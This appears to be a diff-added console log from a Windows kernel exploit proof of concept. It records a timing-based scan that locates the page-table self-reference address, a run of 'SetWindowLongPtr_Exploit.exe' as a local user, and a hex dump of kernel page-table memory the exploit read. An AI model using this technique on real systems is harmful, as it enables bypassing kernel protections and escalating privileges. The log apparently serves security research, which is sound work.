++] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861
++] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334
++] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160
++] PTE FFFFF60804020100 looks mapped! - Time: 204.036926
+PML4e: FFFFF67B3D9ECF60 - Index: 1ec
+KNOWN_UNMAPPED PTE: fffff60000000000
+Real PML4 SelfRef Found: fffff67b3d9ecf60
+Left in Potential Array: ffff8c46231188c0
+Left in Potential Array: ffff8cc6633198c8
+Left in Potential Array: ffff8d46a351a8d0
+Left in Potential Array: ffff8dc6e371b8d8
+Left in Potential Array: ffff8e472391c8e0
+Left in Potential Array: ffff8ec763b1d8e8
+Left in Potential Array: ffff8f47a3d1e8f0
+Left in Potential Array: ffff8fc7e3f1f8f8
+Left in Potential Array: ffff904824120900
+Left in Potential Array: ffff90c864321908
+Left in Potential Array: ffff9148a4522910
+Left in Potential Array: ffff91c8e4723918
+Left in Potential Array: ffff924924924920
+Left in Potential Array: ffff92c964b25928
+Left in Potential Array: ffff9349a4d26930
+Left in Potential Array: ffff93c9e4f27938
+Left in Potential Array: ffff944a25128940
+Left in Potential Array: ffff94ca65329948
+Left in Potential Array: ffff954aa552a950
+Left in Potential Array: ffff95cae572b958
+Left in Potential Array: ffff964b2592c960
+Left in Potential Array: ffff96cb65b2d968
+Left in Potential Array: ffff974ba5d2e970
+Left in Potential Array: ffff97cbe5f2f978
+Left in Potential Array: ffff984c26130980
+Left in Potential Array: ffff98cc66331988
+Left in Potential Array: ffff994ca6532990
+Left in Potential Array: ffff99cce6733998
+Left in Potential Array: ffff9a4d269349a0
+Left in Potential Array: ffff9acd66b359a8
+Left in Potential Array: ffff9b4da6d369b0
+Left in Potential Array: ffff9bcde6f379b8
+Left in Potential Array: ffff9c4e271389c0
+Left in Potential Array: ffff9cce673399c8
+Left in Potential Array: ffff9d4ea753a9d0
+Left in Potential Array: ffff9dcee773b9d8
+Left in Potential Array: ffff9e4f2793c9e0
+Left in Potential Array: ffff9ecf67b3d9e8
+Left in Potential Array: ffff9f4fa7d3e9f0
+Left in Potential Array: ffff9fcfe7f3f9f8
+Left in Potential Array: ffffa05028140a00
+Left in Potential Array: ffffa0d068341a08
+Left in Potential Array: ffffa150a8542a10
+Left in Potential Array: ffffa1d0e8743a18
+Left in Potential Array: ffffa25128944a20
+Left in Potential Array: ffffa2d168b45a28
+Left in Potential Array: ffffa351a8d46a30
+Left in Potential Array: ffffa3d1e8f47a38
+Left in Potential Array: ffffa45229148a40
+Left in Potential Array: ffffa4d269349a48
+Left in Potential Array: ffffa552a954aa50
+Left in Potential Array: ffffa5d2e974ba58
+Left in Potential Array: ffffa6532994ca60
+Left in Potential Array: ffffa6d369b4da68
+Left in Potential Array: ffffa753a9d4ea70
+Left in Potential Array: ffffa7d3e9f4fa78
+Left in Potential Array: ffffa8542a150a80
+Left in Potential Array: ffffa8d46a351a88
+Left in Potential Array: ffffa954aa552a90
+Left in Potential Array: ffffa9d4ea753a98
+Left in Potential Array: ffffaa552a954aa0
+Left in Potential Array: ffffaad56ab55aa8
+Left in Potential Array: ffffab55aad56ab0
+Left in Potential Array: ffffabd5eaf57ab8
+Left in Potential Array: ffffac562b158ac0
+Left in Potential Array: ffffacd66b359ac8
+Left in Potential Array: ffffad56ab55aad0
+Left in Potential Array: ffffadd6eb75bad8
+Left in Potential Array: ffffae572b95cae0
+Left in Potential Array: ffffaed76bb5dae8
+Left in Potential Array: ffffaf57abd5eaf0
+Left in Potential Array: ffffafd7ebf5faf8
+Left in Potential Array: ffffb0582c160b00
+Left in Potential Array: ffffb0d86c361b08
+Left in Potential Array: ffffb158ac562b10
+Left in Potential Array: ffffb1d8ec763b18
+Left in Potential Array: ffffb2592c964b20
+Left in Potential Array: ffffb2d96cb65b28
+Left in Potential Array: ffffb359acd66b30
+Left in Potential Array: ffffb3d9ecf67b38
+Left in Potential Array: ffffb45a2d168b40
+Left in Potential Array: ffffb4da6d369b48
+Left in Potential Array: ffffb55aad56ab50
+Left in Potential Array: ffffb5daed76bb58
+Left in Potential Array: ffffb65b2d96cb60
+Left in Potential Array: ffffb6db6db6db68
+Left in Potential Array: ffffb75badd6eb70
+Left in Potential Array: ffffb7dbedf6fb78
+Left in Potential Array: ffffb85c2e170b80
+Left in Potential Array: ffffb8dc6e371b88
+Left in Potential Array: ffffb95cae572b90
+Left in Potential Array: ffffb9dcee773b98
+Left in Potential Array: ffffba5d2e974ba0
+Left in Potential Array: ffffbadd6eb75ba8
+Left in Potential Array: ffffbb5daed76bb0
+Left in Potential Array: ffffbbddeef77bb8
+Left in Potential Array: ffffbc5e2f178bc0
+Left in Potential Array: ffffbcde6f379bc8
+Left in Potential Array: ffffbd5eaf57abd0
+Left in Potential Array: ffffbddeef77bbd8
+Left in Potential Array: ffffbe5f2f97cbe0
+Left in Potential Array: ffffbedf6fb7dbe8
+Left in Potential Array: ffffbf5fafd7ebf0
+Left in Potential Array: ffffbfdfeff7fbf8
+Left in Potential Array: ffffc06030180c00
+Left in Potential Array: ffffc0e070381c08
+Left in Potential Array: ffffc160b0582c10
+Left in Potential Array: ffffc1e0f0783c18
+Left in Potential Array: ffffc26130984c20
+Left in Potential Array: ffffc2e170b85c28
+Left in Potential Array: ffffc361b0d86c30
+Left in Potential Array: ffffc3e1f0f87c38
+Left in Potential Array: ffffc46231188c40
+Left in Potential Array: ffffc4e271389c48
+Left in Potential Array: ffffc562b158ac50
+Left in Potential Array: ffffc5e2f178bc58
+Left in Potential Array: ffffc6633198cc60
+Left in Potential Array: ffffc6e371b8dc68
+Left in Potential Array: ffffc763b1d8ec70
+Left in Potential Array: ffffc7e3f1f8fc78
+Left in Potential Array: ffffc86432190c80
+Left in Potential Array: ffffc8e472391c88
+Left in Potential Array: ffffc964b2592c90
+Left in Potential Array: ffffc9e4f2793c98
+Left in Potential Array: ffffca6532994ca0
+Left in Potential Array: ffffcae572b95ca8
+Left in Potential Array: ffffcb65b2d96cb0
+Left in Potential Array: ffffcbe5f2f97cb8
+Left in Potential Array: ffffcc6633198cc0
+Left in Potential Array: ffffcce673399cc8
+Left in Potential Array: ffffcd66b359acd0
+Left in Potential Array: ffffcde6f379bcd8
+Left in Potential Array: ffffce673399cce0
+Left in Potential Array: ffffcee773b9dce8
+Left in Potential Array: ffffcf67b3d9ecf0
+Left in Potential Array: ffffcfe7f3f9fcf8
+Left in Potential Array: ffffd068341a0d00
+Left in Potential Array: ffffd0e8743a1d08
+Left in Potential Array: ffffd168b45a2d10
+Left in Potential Array: ffffd1e8f47a3d18
+Left in Potential Array: ffffd269349a4d20
+Left in Potential Array: ffffd2e974ba5d28
+Left in Potential Array: ffffd369b4da6d30
+Left in Potential Array: ffffd3e9f4fa7d38
+Left in Potential Array: ffffd46a351a8d40
+Left in Potential Array: ffffd4ea753a9d48
+Left in Potential Array: ffffd56ab55aad50
+Left in Potential Array: ffffd5eaf57abd58
+Left in Potential Array: ffffd66b359acd60
+Left in Potential Array: ffffd6eb75badd68
+Left in Potential Array: ffffd76bb5daed70
+Left in Potential Array: ffffd7ebf5fafd78
+Left in Potential Array: ffffd86c361b0d80
+Left in Potential Array: ffffd8ec763b1d88
+Left in Potential Array: ffffd96cb65b2d90
+Left in Potential Array: ffffd9ecf67b3d98
+Left in Potential Array: ffffda6d369b4da0
+Left in Potential Array: ffffdaed76bb5da8
+Left in Potential Array: ffffdb6db6db6db0
+Left in Potential Array: ffffdbedf6fb7db8
+Left in Potential Array: ffffdc6e371b8dc0
+Left in Potential Array: ffffdcee773b9dc8
+Left in Potential Array: ffffdd6eb75badd0
+Left in Potential Array: ffffddeef77bbdd8
+Left in Potential Array: ffffde6f379bcde0
+Left in Potential Array: ffffdeef77bbdde8
+Left in Potential Array: ffffdf6fb7dbedf0
+Left in Potential Array: ffffdfeff7fbfdf8
+Left in Potential Array: ffffe070381c0e00
+Left in Potential Array: ffffe0f0783c1e08
+Left in Potential Array: ffffe170b85c2e10
+Left in Potential Array: ffffe1f0f87c3e18
+Left in Potential Array: ffffe271389c4e20
+Left in Potential Array: ffffe2f178bc5e28
+Left in Potential Array: ffffe371b8dc6e30
+Left in Potential Array: ffffe3f1f8fc7e38
+Left in Potential Array: ffffe472391c8e40
+Left in Potential Array: ffffe4f2793c9e48
+Left in Potential Array: ffffe572b95cae50
+Left in Potential Array: ffffe5f2f97cbe58
+Left in Potential Array: ffffe673399cce60
+Left in Potential Array: ffffe6f379bcde68
+Left in Potential Array: ffffe773b9dcee70
+Left in Potential Array: ffffe7f3f9fcfe78
+Left in Potential Array: ffffe8743a1d0e80
+Left in Potential Array: ffffe8f47a3d1e88
+Left in Potential Array: ffffe974ba5d2e90
+Left in Potential Array: ffffe9f4fa7d3e98
+Left in Potential Array: ffffea753a9d4ea0
+Left in Potential Array: ffffeaf57abd5ea8
+Left in Potential Array: ffffeb75badd6eb0
+Left in Potential Array: ffffebf5fafd7eb8
+Left in Potential Array: ffffec763b1d8ec0
+Left in Potential Array: ffffecf67b3d9ec8
+Left in Potential Array: ffffed76bb5daed0
+Left in Potential Array: ffffedf6fb7dbed8
+Left in Potential Array: ffffee773b9dcee0
+Left in Potential Array: ffffeef77bbddee8
+Left in Potential Array: ffffef77bbddeef0
+Left in Potential Array: ffffeff7fbfdfef8
+Left in Potential Array: fffff0783c1e0f00
+Left in Potential Array: fffff0f87c3e1f08
+Left in Potential Array: fffff178bc5e2f10
+Left in Potential Array: fffff1f8fc7e3f18
+Left in Potential Array: fffff2793c9e4f20
+Left in Potential Array: fffff2f97cbe5f28
+Left in Potential Array: fffff379bcde6f30
+Left in Potential Array: fffff3f9fcfe7f38
+Left in Potential Array: fffff47a3d1e8f40
+Left in Potential Array: fffff4fa7d3e9f48
+Left in Potential Array: fffff57abd5eaf50
+Left in Potential Array: fffff5fafd7ebf58
+Left in Potential Array: fffff6fb7dbedf68
+Left in Potential Array: fffff77bbddeef70
+Left in Potential Array: fffff7fbfdfeff78
+Left in Potential Array: fffff87c3e1f0f80
+Left in Potential Array: fffff8fc7e3f1f88
+Left in Potential Array: fffff97cbe5f2f90
+Left in Potential Array: fffff9fcfe7f3f98
+Left in Potential Array: fffffa7d3e9f4fa0
+Left in Potential Array: fffffafd7ebf5fa8
+Left in Potential Array: fffffb7dbedf6fb0
+Left in Potential Array: fffffbfdfeff7fb8
+Left in Potential Array: fffffc7e3f1f8fc0
+Left in Potential Array: fffffcfe7f3f9fc8
+Left in Potential Array: fffffd7ebf5fafd0
+Left in Potential Array: fffffdfeff7fbfd8
+Left in Potential Array: fffffe7f3f9fcfe0
+Left in Potential Array: fffffeff7fbfdfe8
+Left in Potential Array: ffffff7fbfdfeff0
+Left in Potential Array: fffffffffffffff8
+Left in Final Array: fffff67b3d9ecf60
+Result: fffff67b3d9ecf60
+Run SetWindowLongPtr_Exploit.exe
+C:\Users\qa\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60
+My PID is: 6056
+Current Username: qa
+PML4 Self Ref: FFFFF67B3D9ECF60
+Enter to continue...
+
+                                                                                                                         Value Self Ref = 8000000100211867
+000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....
+000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............
+000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`.
+000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8......
+000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8......
+000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?....
+000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............
+000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?.............
+000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5.....
+000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G.....
+000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c.......
+000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
